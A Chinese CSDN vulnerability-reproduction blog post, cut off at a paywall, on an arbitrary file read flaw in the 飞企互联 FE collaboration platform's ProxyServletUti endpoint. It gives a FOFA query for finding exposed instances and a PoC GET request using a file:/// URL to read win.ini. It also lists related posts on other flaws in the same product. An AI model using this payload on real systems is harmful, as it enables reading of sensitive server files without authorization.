飞企互联FE业务协作平台 ProxyServletUti 任意文件读取漏洞复现

已于 2024-04-16 12:44:56 修改
阅读量683 收藏
点赞数 8
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-04-16 12:44:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/137820480
版权

0x01 产品简介

飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。这个平台可以连接人、链接端、联通内外,支持企业B2B、C2B与O2O等核心需求,为不同行业客户的互联网+转型提供支持。其特色在于提供云端工作环境,整合了人工智能、大数据分析和物联网设备管理,为不同行业客户的互联网+转型提供全面支持。通过智能化的决策支持和数据驱动的业务优化,企业可以更灵活、高效地运营业务,实现数字化转型的战略目标。

0x02 漏洞概述

飞企互联 FE 业务协作平台 ProxyServletUti 接口存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:app="FE-协作平台"

0x04 漏洞复现

PoC

GET /ProxyServletUti%6c?url=file:///c:/windows/win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML,
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
飞企互联-FE企业运营管理平台 videotexMonitor SQL注入漏洞复现
0xSec
01-31 771
飞企互联-FE企业运营管理平台 videotexMonitor接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
飞企互联-FE企业运营管理平台 parseTree SQL注入漏洞复现
0xSec
02-23 456
飞企互联-FE企业运营管理平台 parseTree 接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传漏洞复现_servlet uploadattachmentservlet(1)
m0_60567881的博客
04-12 232
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
漏洞复现飞企互联-FE企业运营管理平台——uploadAttachmentServlet——文件上传
最新发布
LongL_GuYu的博客
07-10 865
飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。其`uploadAttachmentServlet`存在文件上传漏洞,导致恶意攻击者可以上传恶意后门、木马等,从而获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
飞企互联-FE企业运营管理平台 多处登录绕过漏洞复现
0xSec
12-28 1695
飞企互联-FE企业运营管理平台2.ln、loginService.fe等接口处存在登录绕过漏洞,未授权的攻击者可构造恶意的url访问页面,可直接进入后台管理页面,获取敏感信息,进一步利用可控制整个服务器。
飞企互联企业运营管理平台存在任意文件读取
qq_36334672的博客
01-24 360
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
产业互联下面向云平台的智造供应链信息协作
05-06
本文提出云平台解决智造供应链信息协作的方案,该方案考虑了分布式协作理论应对庞大供应链业务数据的技术优势,构建了分布式下实时动态更新算法和共享数据资源池相结合的供应链企业数据互联互通协作模型,以提升产业...
飞企互联:2021年半年度报告.PDF
08-28
飞企互联的核心产品,如FE智慧园区公共服务平台v7.0.0,在2021年2月被纳入《2020年珠海市创新产品清单》,彰显了其创新和技术实力。此外,公司在3月份与中移动重庆公司和中移系统集成有限公司达成战略合作,共同推进...
飞企互联:2021年半年度报告.rar
09-29
2. **业务板块分析**:飞企互联可能涉及多个业务领域,如云计算、大数据、物联网等。报告将详细列出各业务板块的营收情况,帮助读者了解哪些业务是公司收入的主要来源,以及各业务的增长趋势。 3. **市场地位**:...
号码百事通平台互联方案探讨
01-20
本文提出了两种通过平台互联来提供区域性号码百事通业务的新方案,并对实施号码百事通平台互联后的业务合作前景、赢利点及结算模式等进行了分析和说明,为全网性号码百事通业务的发展提供了新思路。
网络互联实验平台代码 java网络互联实验平台代码
02-20
网络互联实验平台代码 java网络互联实验平台代码 基于SSM的网络互联实验平台代码 1、网络互联实验平台的技术栈、环境、工具、软件: ① 系统环境:Windows/Mac ② 开发语言:Java ③ 框架:SSM ④ 架构:B/S、MVC ⑤ ...
漏洞复现飞企互联-FE企业运营管理平台——SQL注入
LongL_GuYu的博客
06-28 634
飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。其`treeXml.jsp`接口存在sql注入,恶意攻击者可能会向数据库发送构造的恶意SQL查询语句
飞企互联-FE企业运营管理平台管理员权限登录绕过漏洞复现
qq_39573664的博客
12-29 813
飞企互联FE企业运营管理平台存在一个潜在的安全漏洞,涉及到2.ln接口的登录绕过问题。未经授权的攻击者可以通过构造恶意的URL访问页面,直接进入后台管理页面,获取敏感信息。这种漏洞可能为攻击者提供了进一步控制整个服务器的机会,对系统的安全性构成潜在威胁。
漏洞复现--飞企互联FE业务协作平台ShowImageServlet任意文件读取
qq_53003652的博客
11-20 383
FE办公协作平台是基于业务应用模型驱动开发技术与工作流的协作技术、采用了面向业务部件技术,实现应用开发、运行、管理、维护的信息管理平台。该产品ShowImageServlet 文件存在任意文件读取
飞企互联-FE企业运营管理平台 druid路径 弱口令漏洞复现
0xSec
04-08 682
飞企互联-FE企业运营管理平台/druid/login.html 路径处的登录接口存在弱口令漏洞,未授权的攻击者可通过该漏洞直接进入后台管理页面,获取敏感信息,进一步利用可控制整个服务器。
飞企互联FE业务协作平台ShowImageServlet接口任意文件读取漏洞
xiaokp7的博客
09-13 748
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
漏洞复现飞企互联FE企业运营管理平台 uploadAttachmentServlet 任意文件上传漏洞
https://blog.echo234.cn/
03-25 703
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台飞企互联FE业务协作平台uploadAttachmentServlet 任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值